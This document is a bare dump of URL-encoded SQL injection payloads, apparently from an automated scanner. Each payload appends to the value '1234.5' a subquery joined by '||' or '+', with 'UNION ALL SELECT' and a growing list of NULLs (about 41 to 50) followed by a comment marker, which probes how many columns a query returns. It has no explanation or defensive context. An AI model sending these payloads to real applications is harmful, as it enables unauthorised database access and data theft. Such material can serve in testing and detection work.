1234.5%27%20%7C%7C%20%28SELECT%208413%20FROM%20DUAL%20WHERE%202721%3D2721%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%206584%20FROM%20DUAL%20WHERE%207827%3D7827%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%209433%20FROM%20DUAL%20WHERE%204876%3D4876%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%203012%20FROM%20DUAL%20WHERE%205288%3D5288%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%202205%20FROM%20DUAL%20WHERE%206202%3D6202%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%209259%20FROM%20DUAL%20WHERE%209133%3D9133%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%209924%20FROM%20DUAL%20WHERE%206834%3D6834%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%206025%20FROM%20DUAL%20WHERE%202585%3D2585%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%208514%20FROM%20DUAL%20WHERE%204104%3D4104%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%201038%20FROM%20DUAL%20WHERE%204365%3D4365%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%203182%20WHERE%202733%3D2733%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%209789%20WHERE%209454%3D9454%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%209942%20WHERE%203016%3D3016%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%206074%20WHERE%204316%3D4316%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%202777%20WHERE%205098%3D5098%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%208108%20WHERE%206111%3D6111%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%209403%20WHERE%201315%3D1315%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%202010%20WHERE%202140%3D2140%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%207547%20WHERE%207949%3D7949%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%207819%20WHERE%209171%3D9171%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1234.5%20%2B%20%28SELECT%209919%20FROM%20DUAL%20WHERE%204301%3D4301%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1234.5%20%2B%20%28SELECT%205346%20FROM%20DUAL%20WHERE%201289%3D1289%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1234.5%20%2B%20%28SELECT%204577%20FROM%20DUAL%20WHERE%201835%3D1835%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1234.5%20%2B%20%28SELECT%204860%20FROM%20DUAL%20WHERE%205761%3D5761%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1234.5%20%2B%20%28SELECT%206317%20FROM%20DUAL%20WHERE%208566%3D8566%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1234.5%20%2B%20%28SELECT%209491%20FROM%20DUAL%20WHERE%209654%3D9654%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1234.5%20%2B%20%28SELECT%208564%20FROM%20DUAL%20WHERE%201033%3D1033%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1234.5%20%2B%20%28SELECT%202332%20FROM%20DUAL%20WHERE%207020%3D7020%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1234.5%20%2B%20%28SELECT%203521%20FROM%20DUAL%20WHERE%201007%3D1007%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1234.5%20%2B%20%28SELECT%205425%20FROM%20DUAL%20WHERE%203195%3D3195%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1234.5%20%2B%20%28SELECT%206596%20WHERE%208564%3D8564%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1234.5%20%2B%20%28SELECT%206204%20WHERE%206408%3D6408%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1234.5%20%2B%20%28SELECT%206191%20WHERE%205869%3D5869%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1234.5%20%2B%20%28SELECT%202490%20WHERE%209274%3D9274%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 